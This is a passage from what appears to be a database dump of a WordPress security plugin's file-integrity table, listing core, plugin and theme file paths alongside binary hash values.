����O���','wp-includes/wp-includes/IXR/class-IXR-base64.php',0,'�*6���D�T�e��','�*6���D�T�e��','?F]L�2}���\rS�@b�2�O�o�uU\'O��','',0,'?'),('�G�|$p֠+(�','wp-admin/js/tags-box.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9W�`��(P�E쐷','�������}�;R)_�J7���*��?���[','',0,'?'),('�H��ɪ\Z퟽4��ͻ','wp-content/plugins/wp-cerber/assets/flags/cl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�Q�a�A�ߜ����',' I���ײ|01aK�ը�r%բ�(ظlR�','',0,'?'),('�R��B�p��m�Z�;','wp-includes/css/dist/block-editor/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��vm˜	�\0�����','H�8��2���8��f��U��Tn���A �','',0,'?'),('�y�Hz��\"�\\����','wp-content/plugins/wp-cerber/assets/flags/tl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�/`�3˸:��Ldlj','q\0HP��+���m �l�K��(��H�','',0,'?'),('�o�j����y��V','wp-content/plugins/wordfence/lib/menu_tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gԌ�p�P�Ig[=��','�V���!�ޟ��ƚ_z�=�|�yaX�ȏ�','',0,'?'),('��Ca�s�]��n�/��','wp-includes/css/dist/block-library/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�,U���ʑ�','��܉�)�\0I]�7h�S��l�(�B\n}kw�a','',0,'?'),('��Ѻ�\"�P5��^U�\Zi','wp-admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�	Ki\Zb+GZ��B','\r9�cgfĊ�T�v��S(�9IE�$�pH��','',0,'?'),('����h|�d7��k�Nn','wp-includes/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php',0,'\"<8���.���K�\'','\"<8���.���K�\'',' \ZYӵ�˼*�,Q�L�Y{�㬣p�\r�h���','',0,'?'),('��m���z4�L��K','wp-admin/images/xit.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('����A�G,��<���','wp-includes/js/jquery/ui/effect-fade.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*Bz��L��','�j�fD�G��=c�Fs㏽���~�쉹X','',0,'?'),('����n\0D,����;R','wp-content/plugins/wordfence/js/jquery.dataTables.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\\�� �͕�h�','v�Ao;�uD�3$�WB95�_\"��� �','',0,'?'),('���C�ez���q�x','wp-includes/wp-includes/css/admin-bar-rtl.css',0,'����r���ju','����r���ju',',t�c*	2�����3ئI����4�j','',0,'?'),('��6�Sqc��H��)','wp-includes/wp-includes/js/jquery/ui/selectable.min.js',0,'�ZIr��]-�4��','�ZIr��]-�4��','�]���+�R��s���z�lC�a���(8��','',0,'?'),('����ؙ�3���','wp-includes/wp-includes/js/masonry.min.js',0,';?�&��T�Je�xH',';?�&��T�Je�xH','$��!�|=#f�c�jc���:��T�Q0b�,ʉ�','',0,'?'),('�����հ	̋�Ȳ�S','wp-content/plugins/wordfence/views/scanner/scan-progress-detailed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�Ƚ� ����\\E','��\\�	����O��JpF�>Q�� �?��lgi���.','',0,'?'),('� �n�$��q��^qf��','wp-includes/images/smilies/icon_lol.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����:ѷ&����(�','�l�1�Hq�.�2�x��󢾉$�Y�\Z8�','',0,'?'),('�\'^�D��IG�1��!','wp-includes/ms-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ظ;�#�t��r�/+0','J�c�CBE�䱢?$Gq�u,7��ޚ�A�','',0,'?'),('�*T�u\r�����~�m','wp-admin/css/colors/ocean/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v0O��,�ᤴX�׺�','찐p\\B�lI����`�{i�~����&QO','',0,'?'),('�1l<� t~L�Uw�','wp-includes/class-wp-locale.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�P�<�#��\0�\':','�D��n]����AW�EH�O�H�@�hAD}','',0,'?'),('�E-j��1j��\r�E�','wp-includes/registration-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q<۾\Z7�M�v��','Kd���_�MF� X��X�.,\'T\\��6���6','',0,'?'),('�[���d�m{&oL!Τ','wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js',0,'��v�<h������p�','��v�<h������p�','!�/�[I�+\r��G���� Dխ�7�=�����\'','',0,'?'),('�]oM�se��J4�','wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o���h5��\rxܖN','6y\Zu�υ;�	�0�~�rs1J�9��X���J���','',0,'?'),('�f ��r�p�(��p�$�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��bD�@p�G+��','*DZ�>�Bg�&Y�Y������4(<�/','',0,'?'),('�g�K�;�qF�VI}�Q�','wp-includes/Requests/Exception/HTTP/416.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�N9�ɪ�a�Dx�','�(��mybV�aI�jWp���(!A����<(�X','',0,'?'),('�|N�ݾfo��e4b`>�','wp-includes/wp-includes/js/jquery/jquery-migrate.min.js',0,'y��k~�x�$K^-3�}','y��k~�x�$K^-3�}','��P�y���D\\\\�cd�~��P���`7 �F/','',0,'?'),('�������<�x�B�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���xqE̜$�b0^�s','T\0>�t�d��ը&\Z4qɢ���A :�C�C��Q','',0,'?'),('��e�-��Rȉ���L:�','wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�Z��O�;�m�#�','�v�̀��O��=��n��u�#�}��զ`�4�W�','',0,'?'),('���`��Is��^.A','wp-includes/wp-includes/images/media/spreadsheet.png',0,'�4���\0T��̇?�','�4���\0T��̇?�','����v��)�\n�6Zl��2���В1�!+	�','',0,'?'),('��6D�:|g�(�\\FL�','wp-content/themes/sg-window/content-jetpack-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'>�U�>s�h���','�x��톕��Dn	O���s�j�9)��0�k$\r','',0,'?'),('��p?E^�@�\'��PE�','wp-admin/edit-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��L�(�`��#��','W~T+��$��zgbl�ء\'���p3��m�1','',0,'?'),('������U�\\��a�E','wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��ͱ��r0��؅=�','?E�%��+�����w�\r�^�֗.$�i�$[W','',0,'?'),('���i��֯1�o�R!','wp-content/plugins/wp-cerber/assets/flags/fm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=KbF�!X�ټh[�(@','/������ˆ�_S��L��`ZI�I(1���','',0,'?'),('�-4ͧb�Q?�)\n�','wp-includes/wp-includes/blocks/pullquote/block.json',0,'\r�1��ݗz��sK�c','\r�1��ݗz��sK�c','v�K�N��`\ZX�n$`7P��Y6�~ON�1�','',0,'?'),('�B����!��vݡɶ','wp-content/plugins/wordfence/views/onboarding/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zz�#uv��\0���','��}���|IR€�v�J�%-�/\n�V���','',0,'?'),('�<��(��*A]�O�','wp-admin/css/colors/ocean/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','35\"�e4��9��,<?','n)(�Q�hA`�[��汶<�J��t({��dـ','',0,'?'),('�@	�]`&e�ȸ�F�I','wp-content/themes/shootingstar/css/pie/PIE_uncompressed.htc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�۶v�*:$��8^','�Q�rо�����r��F_r]ܵĪ�w	��','',0,'?'),('�D��d.P˴{-yo�g','wp-content/plugins/wordfence/views/common/status-warning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�f�uֺg-g\0C�=v','�N<\r�;��d�*��8+)�\ZbO?�0��E���','',0,'?'),('�I|�K9�(�{s�X','wp-content/plugins/wordfence/lib/menu_scanner_credentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}����\0���\Z�̿�','|�?b~����ڬ��(�ʹ׺;l�G9��','',0,'?'),('�a�ͮ�(�o��:`','wp-content/plugins/wp-cerber/assets/flags/dm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�<�-�.��w','��h*W̕|l�0jhWp:���z��[V,','',0,'?'),('�bv��E��H���΄','wp-includes/js/wp-lists.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M4���KYs:��ȫ�','󩶓����Z-3w�Eї\rqK]��3�]��.X','',0,'?'),('�hS����:���`','wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�+C#+|�fZ���]�','kn\Zy�&��_��[��Igl�(�g\'�^�G','',0,'?'),('�o��M��F�7���','wp-includes/wp-includes/js/dist/reusable-blocks.min.js',0,'�,�F疋��nA�^','�,�F疋��nA�^','�KJE(iLõN��5���KTc�B0$]�-}�۹','',0,'?'),('�s�U\nM�t�mH|Ҭ�','wp-includes/wp-includes/class-wp-locale.php',0,'�S�P�<�#��\0�\':','�S�P�<�#��\0�\':','�D��n]����AW�EH�O�H�@�hAD}','',0,'?'),('��N�1$y�\ZJ+�t��','wp-includes/wp-includes/SimplePie/Cache/File.php',0,'P��8?Q��h׊�','P��8?Q��h׊�','~�`��嫌�<��B\n鲙%]��X}\Zi��','',0,'?'),('������n@���+�\"�','wp-includes/wp-includes/js/customize-selective-refresh.js',0,'�uP岉�0x\Z�����','�uP岉�0x\Z�����','��q�˖jZC~����<sħ+�RI!�H��','',0,'?'),('����ZD��F��7vp','wp-includes/wp-includes/js/shortcode.min.js',0,'�Ad�\'w#6?��w�','�Ad�\'w#6?��w�','�����Q� 9I��o��T-�79_!���`','',0,'?'),('��˜���MX)�o��','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.min.js',0,'rt\0X��d�xR`��','rt\0X��d�xR`��','��b�ՔW�?��gtRċ\\}�D�E�TӇ��=','',0,'?'),('���&��N�,���6P','wp-admin/images/icons32-vs-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*04�G4F�	&Z�i}\"','�.a�}��hw�6�WEʭ�(3�Jӭ�9�E�','',0,'?'),('�д��\0N莦v�\n=t','wp-content/plugins/wp-cerber/assets/flags/cz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cR��}S������J�','�m*1\"�vl�ř:\\��f����?.�؟i��\0�','',0,'?'),('��v��#q���ȃ�','wp-includes/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EOxٕX�2떭؃','x��aJN�!e���\"\"Nq�}�AMC�1)��{�j','',0,'?'),('��W31��N���gפ��','wp-includes/js/dist/vendor/react.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jB���e�}����\"\Z','�g��+_u<!�\'��[��N�b�r��c�>;','',0,'?'),('��x[�e��>M�','wp-admin/includes/edit-tag-messages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m-I�f3�f\\Z��','u�-h�yjL��!z�V���-1�nyFY�Ý�&�','',0,'?'),('��=\'�����BO�l','wp-content/themes/shootingstar/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8t���`\rK/� �.��','�aP�΄��b9��F5�º��� ���y���W','',0,'?'),('��v06��^n��8��','wp-includes/wp-includes/link-template.php',0,'�Kn~�?��ӂ~d�','�Kn~�?��ӂ~d�','�,�P��en��y����\\A�8����2��','',0,'?'),('�cT��ޤmF=)��','wp-includes/wp-includes/css/dist/edit-post/style.css',0,'�-��b�E��y�L�J��','�-��b�E��y�L�J��','—9 �`��\'@GGXLH��K����Ħ�ᚆ','',0,'?'),('�q�h���Bc�92��','wp-admin/network/site-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bh@�Uj՟���G��\'{','9;#���l+��9���\"��p�LŢ�ۈ�|','',0,'?'),('��n1.Óu�t���lX','wp-admin/css/colors/modern/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+@}�����nf\Z��E','Xi� t���j<u&����%C�\rA��\0�6!�','',0,'?'),('����`%��{��+��','wp-content/plugins/wordfence/images/icons/error128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:�%7�!��.�','{h\0,�]�z�k�V�{җ�6nG\n�x��s9�','',0,'?'),('���v��\\Q���-��','wp-includes/js/tinymce/plugins/hr/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	%>�)���•;��','؃F��S�[k���&�f� 6+�b�>��','',0,'?'),('��t��h�	,Gx�\"M','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��R�N\Zb8M�g�|','{�����R�tH}��ܧYQ��{�F\Z�H�','',0,'?'),('�ƚ�ŏH�Wn�\'i�','wp-content/plugins/wp-cerber/assets/goo-translate.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�c�\"C�!㋫x�o','�>��Cv^��/�V����r��cCƨK(��P��','',0,'?'),('���9�X����U�7�z','wp-content/plugins/wordfence/models/page/wfPage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�bo i�%H��Xw�Xv','ƅ1h�/jw�<U���\\�k�q%s|W�6��','',0,'?'),('��і�q��SGKy(�','wp-includes/kses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>F�ނS\0wt�R��','J�Mv��CkcC^f�`ƨ� S�@`�Uny�+��','',0,'?'),('�4�di�I�������%','wp-includes/wp-includes/js/dist/element.min.js',0,' ����)��o��^\n�',' ����)��o��^\n�','l���\Z!:�Ϋ�?!���i����;�i�','',0,'?'),('�9��l�ן? r��q�','wp-includes/class-wp-user-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�Iyʰ�BzR��>�O','�gu,�$�bh�/7��C�<�l=��0x�3�x','',0,'?'),('�%��?���)�','wp-content/plugins/wordfence/views/common/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w]�Q�V�մi�','��q���r*���-T���N5�\r��Oc;m�a�','',0,'?'),('�&���FvW�,�	','wp-includes/wp-includes/IXR/class-IXR-request.php',0,'%p.<�Sǡ��z1Ϣ','%p.<�Sǡ��z1Ϣ','Q�*k�_}��2���>T�q<�_S�:�Qh�','',0,'?'),('�DS���3.įy}�;','wp-admin/images/browser-rtl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\"��ӠA�\Z����%̝','+啧���0��p�Ɯ��JMk �q�w�Xب�','',0,'?'),('�[�Hn[P�.~���FU|','wp-includes/nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(������%��ӯq','?^��в�W�}T{5�3�m�T�:�锟��G','',0,'?'),('�j��\\��Ħ<y�p�','wp-includes/widgets/class-wp-widget-custom-html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���dz\'E�n�N��','��l.��M|yc�)�Vr�]�Ak�:Ʃ\"�A','',0,'?'),('�z�\0��a�?�A��y','wp-content/themes/sg-window/img/icons/small/delicious.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�,��,�qXs2��','q;��?O�O�sGt>�i�\Zt}a⟑�S��H�','',0,'?'),('����tCβ��<\n��/�','wp-includes/wp-includes/embed-template.php',0,'��U�z�A>z�\'!f*','��U�z�A>z�\'!f*','*xJ���\"�t��\r^K$U�09���Z�иC�ru','',0,'?'),('����Z�\Zxcy�d��\'','wp-admin/js/language-chooser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U>�p4J�l��5�=','9���\rX�L�dC5@U���K&>̓l��#�','',0,'?'),('���-�4u��\Zo�','wp-content/plugins/wp-cerber/assets/flags/ye.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t?H&��@\r\r�J�','�~��p��\"&qƝq�*��۔�QV��Y�\\F','',0,'?'),('�������,l̵�J�','wp-includes/wp-includes/sodium_compat/src/Core32/SecretStream/State.php',0,'\Zjo�\0��y,�*�}c','\Zjo�\0��y,�*�}c','2p\"Wj����s�lf&S@�[�\\��\"W�','',0,'?'),('���%���\\(w����&','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I\0��$K��  �	','V�p\Z�1͌э�\'=~�ٲ�F_u\\��P�','',0,'?'),('��G^�2G��%�k���','wp-content/plugins/wp-cerber/assets/flags/fr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('��Gfir\0�)�|��S','wp-content/plugins/wordfence/css/phpinfo.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��Q���!�0w/�蓴','���a�@|��I\r=\Z^ε�d)�[�����W��','',0,'?'),('�����:x�=�}�','wp-includes/js/jquery/ui/mouse.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J�;��ty����','�G������[&�~ͤ�E3�	�z͟��ӱ�','',0,'?'),('��C)�VxzϞ�ΩtP','wp-content/plugins/wp-cerber/assets/flags/um.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�xQos:h�\0A�qY','�?85�ϝ��r�o�e��[UԦM��\\','',0,'?'),('��H�a�+����̰I�','wp-content/plugins/wordfence/waf/bootstrap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�%�S�\\!+���d�~','���8���|~�‘1뢇�:�HB�g撚r','',0,'?'),('��{��e�E�C��@@7','wp-includes/wp-includes/js/comment-reply.min.js',0,';Yó8y�F0��P^',';Yó8y�F0��P^','�o��%cܫԕ-��zt�����Qs��<{�','',0,'?'),('��O�I��Y�\\�{=�H','wp-includes/robots-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\��líܓM��','^�h��R߻u�ɆCZ11��S���&̊p0','',0,'?'),('��y�&a�A�7�]Dm','wp-content/plugins/wordfence/images/icons/ajaxRed16.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���%���B\ng�2��;','D,�A�J���lOS�p�e؇�&���','',0,'?'),('�ƞׅ\ZX�X]�Y�F','wp-includes/js/codemirror/htmlhint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�|џ�G�MtP5��','\0U[\0�M\'mCռ5��5k`����5�ё','',0,'?'),('��OQ>�f���k�U','wp-includes/wp-includes/assets/script-loader-packages.php',0,'-�K��a�e�kb\r�5','-�K��a�e�kb\r�5','�^h&޺^I��nb�ކ�n:*jB�_��3�V+n�','',0,'?'),('� a\"KwT�bc1S','wp-admin/css/revisions.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǰW��{�jڛ/$��','��j	ELCo�!;u��:�蛜|�|/���3eom','',0,'?'),('�$Š@�hAI$&�O�','wp-includes/wp-includes/images/crystal/spreadsheet.png',0,'5�9�Т1�T��n��','5�9�Т1�T��n��','e\rC��i0��[��R�8@���G���aJN�','',0,'?'),('�-�[ip��\\^���]','wp-includes/widgets/class-wp-widget-tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x̭&�b�+|eS�݂','�,��ɼ?��?�	p�f\0qO��_���&N9','',0,'?'),('�0�&�Y�������','wp-content/plugins/wordfence/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('�2l�Ƴ;���-6�','wp-content/plugins/wp-cerber/modules/aaa-wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3W�T��\r�ط�18��','<�[�7�LĆ9�>gQ�:�56��bW�7��','',0,'?'),('�4g��e���>���ߝ','wp-admin/images/list-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hջIS�2��i�g�','��J�p�S_��X��#���UB�-z���,�','',0,'?'),('�;�f�J1��˘��+C','wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�<���^��=�f','s]ѽj$��	��↜������Sk��ik�','',0,'?'),('�OOwT�M\r��Y�!d','wp-includes/js/mediaelement/mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-6�������m����','���%�]�cط�Z���7�\n�ԋ���2���','',0,'?'),('�]ǿ|������IC�','wp-includes/js/dist/keycodes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q��^ύ�/�','v<��K���:?�4��@�p��3<�v\0��V','',0,'?'),('�fkj��N�Uei4=%�','wp-admin/js/tags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�,�yS�h�K=�c','9|Wü��yt�ϝ���]P,is�Ǯ���S7F���','',0,'?'),('�y%���Ǻ~�ne\"V','wp-admin/css/list-tables-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Rb��q\"�]�+\\','��m>� ��ӵ㿞í��\ZC��(8��(','',0,'?'),('�{�v�.��h��','wp-includes/wp-includes/class-wp-tax-query.php',0,'��}���nBJw�k�0','��}���nBJw�k�0','��,�In����\n��׋�E,��@�h�1����','',0,'?'),('��\Zv\0��̀Fn8���','wp-content/plugins/wp-cerber/assets/flags/tm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�d&���&����/��','�p�DƱq��ߙcc����D�J�cT5@�U�v\n','',0,'?'),('����<��k$�R�F�S','wp-includes/wp-includes/js/dist/plugins.min.js',0,'�Eg���Zm\Z��4\0�','�Eg���Zm\Z��4\0�','�ьZ;�9�c`.�Є�7��7�S��Z?��mߜ','',0,'?'),('���/�-�Tǻ�T<�S','wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�L��$�~ZvV��','�\"��꯹�bG�����|���E���L�ٟ,','',0,'?'),('���@�qּ���d�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305.php',0,'Qy���?�;�8�V\n�','Qy���?�;�8�V\n�','\0�-��]뮳��XEt)�`��1�C�}Mr2�/','',0,'?'),('�ŕ��B^u?���3','wp-admin/images/about-color-palette.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B���i�h\n�[v���','\Z�AS��[�[��kn/�:�%��>\Z\'��_','',0,'?'),('�̎�뙎��f��9','wp-content/themes/sg-window/sidebar-2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0QHL���.0L����s','JX��/�9�����y�+#��bp��?�','',0,'?'),('�׫�����^y�_\r�','wp-content/themes/sg-window/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M��NiJf��\"Ԛ',':Ӎ���L�0VH�5�\'�~\0��5	GO�����','',0,'?'),('�)�E)�M�/^�P*x','wp-includes/wp-includes/css/dist/block-directory/style.css',0,'��?)LH\rb��pi','��?)LH\rb��pi','7h����/���/y��3L��\"�U��n��H\n��','',0,'?'),('�1�o%��q�A��','wp-admin/js/inline-edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�~<B^��k���','v-��a�F\\C�0��7C�����=VlԺ�','',0,'?'),('�M2j��\'uB��J�\r^','wp-includes/wp-includes/js/dist/redux-routine.js',0,'K�|�WaU\0��κ�Ht','K�|�WaU\0��κ�Ht','�B&�VJ�ŋd�#�l�f��c;�}3T�%K{','',0,'?'),('�TL �߈,]��զ�m�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�	�����:{��W��e','6{w���^Gk�Ϋ�25�b��\r��񓫄�','',0,'?'),('�Z�khƾ|�%�jВA','wp-content/themes/sg-window/inc/css/list.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�)ɹ@�2�f��','VA�\0����W�����ܲ��`���jd}(','',0,'?'),('�m�H�:�M���*��^','wp-includes/css/dist/editor/editor-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iۘ\"���뱠��','���by:��8�3��o�\Z������\"ڹ�','',0,'?'),('�z�h9��ꈦ��Xp�+','wp-content/plugins/wordfence/views/scanner/no-issues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xt-|�F������e�','��_?7���c���:_��@���E�J��s��[','',0,'?'),('��9�n����P,��A��','wp-content/plugins/wp-cerber/assets/flags/pm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��\'�)v\rC��','`&�k$\nuxd�sh��RZ�\r��� (�Qf�','',0,'?'),('����v���V5ǃ�D�u','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڄ�\n�1�h;!�','�Mϡ�	����p�k��)����!\r��','',0,'?'),('��E�S�c+��#�)','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�Nm�S���C��{�','���P~�{p��}x{�8�2�hX�x���','',0,'?'),('��F�����{��A','wp-content/plugins/wordfence/lib/sysinfo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{X�6��92����','G,��=����C\Z3���~f�(8��Ψ��@�,ї','',0,'?'),('��E���Q?��	(�','wp-includes/class-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j,;�\Z3�x���','��0�v�!�vv7�H�lV�d���i\'K�����','',0,'?'),('�.݁B��xK�Y�','wp-includes/ms-default-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�����n����','W�a�h\n�\0�8u�v���yv,N�����!�wh','',0,'?'),('�\n`Z�Q*�N�v�~','wp-includes/wp-includes/sodium_compat/composer.json',0,'`��NKp@}���\r�|','`��NKp@}���\r�|','���a���<K�-��Ìb=7t�#�-8��/��`','',0,'?'),('��6����~e�{�\".w','wp-includes/widgets/class-wp-widget-recent-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���f%�(��xfn3','��0ſ���Y�~�YǦ�����m','',0,'?'),('�*O-�Lτ���\r[�u','wp-admin/css/about-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��^Z\"^�v�\r','�\r�w�^���攗\n-�_l��<��\"���4W�X','',0,'?'),('�??n�����_2g��j','wp-includes/js/wp-util.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�J���2$J��+���','�u������g⽶����`߆�]�SR,�а�','',0,'?'),('�P_ւz���X�j�}D','wp-includes/wp-includes/class-wp-taxonomy.php',0,'Kx�om���u�5t�','Kx�om���u�5t�','��8TI�|�|C�!��`vg�#�Q!ɓ{=��','',0,'?'),('�Yg�$z�H�.Y��','wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gj��z7=���','����g��%��R�C�R}<�0�]�uɬK','',0,'?'),('�\\����\\�hO����','wp-includes/wp-includes/class-wp-http-ixr-client.php',0,'�����2���5K','�����2���5K','�BVrAC\n�a�+���(�;%�FdC��TD�#��','',0,'?'),('�f�踜΀��\n','wp-includes/wp-includes/post-thumbnail-template.php',0,'���d��V��cꘄ','���d��V��cꘄ','G�%*�J	